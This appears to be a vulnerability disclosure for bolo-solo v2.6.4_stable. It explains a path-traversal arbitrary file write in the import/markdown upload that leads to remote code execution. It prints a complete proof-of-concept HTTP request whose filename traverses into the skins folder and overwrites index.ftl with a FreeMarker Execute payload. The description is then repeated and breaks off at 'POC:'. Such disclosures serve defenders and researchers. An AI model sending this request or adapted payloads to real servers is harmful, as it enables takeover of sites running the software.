In the bolo-solo v2.6.4_stable version, the 'import/markdown' feature has an arbitrary file write vulnerability due to the lack of security validation on filenames.
Vulnerability file: src/main/java/org/b3log/solo/bolo/prop/BackupService.java
In the file upload logic of this method, uploaded files are stored without any security validation of the file extension or filename, leading to a directory traversal vulnerability combined with arbitrary file upload and arbitrary file write.
The website uses FreeMarker for rendering; therefore, arbitrary file write can be used to modify .ftl template files, leading to RCE. Modify the index.ftl file under the path \bolo-solo-2.6.4\classes\artifacts\bolo_war_exploded\skins\bolo-sakura.
Successfully written:
Switched the skin and accessed the page, triggering a calculator pop-up.(RCE)
POC:
POST /import/markdown HTTP/1.1
Host: localhost:8080
Content-Length: 1046
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not_A Brand";v="99", "Chromium";v="142"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEOKl8J4fcvx2RKj
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/admin-index.do
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundaryBEOKl8J4fcvx2RKj
Content-Disposition: form-data; name="file"; filename="/../skins/bolo-sakura/index.ftl"
Content-Type: application/x-zip-compressed
<#include "../../common-template/macro-common_head.ftl">
<#include 'header.ftl'>
<#assign ex="freemarker.template.utility.Execute"?new()>
${ex("calc.exe")}
<body nonce-data="4fb3a4be0d" class="home blog hfeed chinese-font">
<div class="scrollbar" id="bar">
</div>
<section id="main-container">
<div class="headertop filter-dot">
<#include 'macro-header.ftl'>
<div id="content" class="site-content">
<div id="primary" class="content-area">
<#if pjax><!---- pjax {#pjax} start ----></#if>
<#include "article-list.ftl">
<#if pjax><!---- pjax {#pjax} end ----></#if>
</div>
</div>
</div>
<#include 'macro-footer.ftl'>
</section>
<#include 'side-mobile.ftl'>
<#include 'footer.ftl'>
</body>
</html
------WebKitFormBoundaryBEOKl8J4fcvx2RKj--
In the bolo-solo v2.6.4_stable version, the 'import/markdown' feature has an arbitrary file write vulnerability due to the lack of security validation on filenames.
Vulnerability file: src/main/java/org/b3log/solo/bolo/prop/BackupService.java
In the file upload logic of this method, uploaded files are stored without any security validation of the file extension or filename, leading to a directory traversal vulnerability combined with arbitrary file upload and arbitrary file write.
The website uses FreeMarker for rendering; therefore, arbitrary file write can be used to modify
.ftltemplate files, leading to RCE. Modify theindex.ftlfile under the path\bolo-solo-2.6.4\classes\artifacts\bolo_war_exploded\skins\bolo-sakura.Successfully written:
Switched the skin and accessed the page, triggering a calculator pop-up.(RCE)
POC: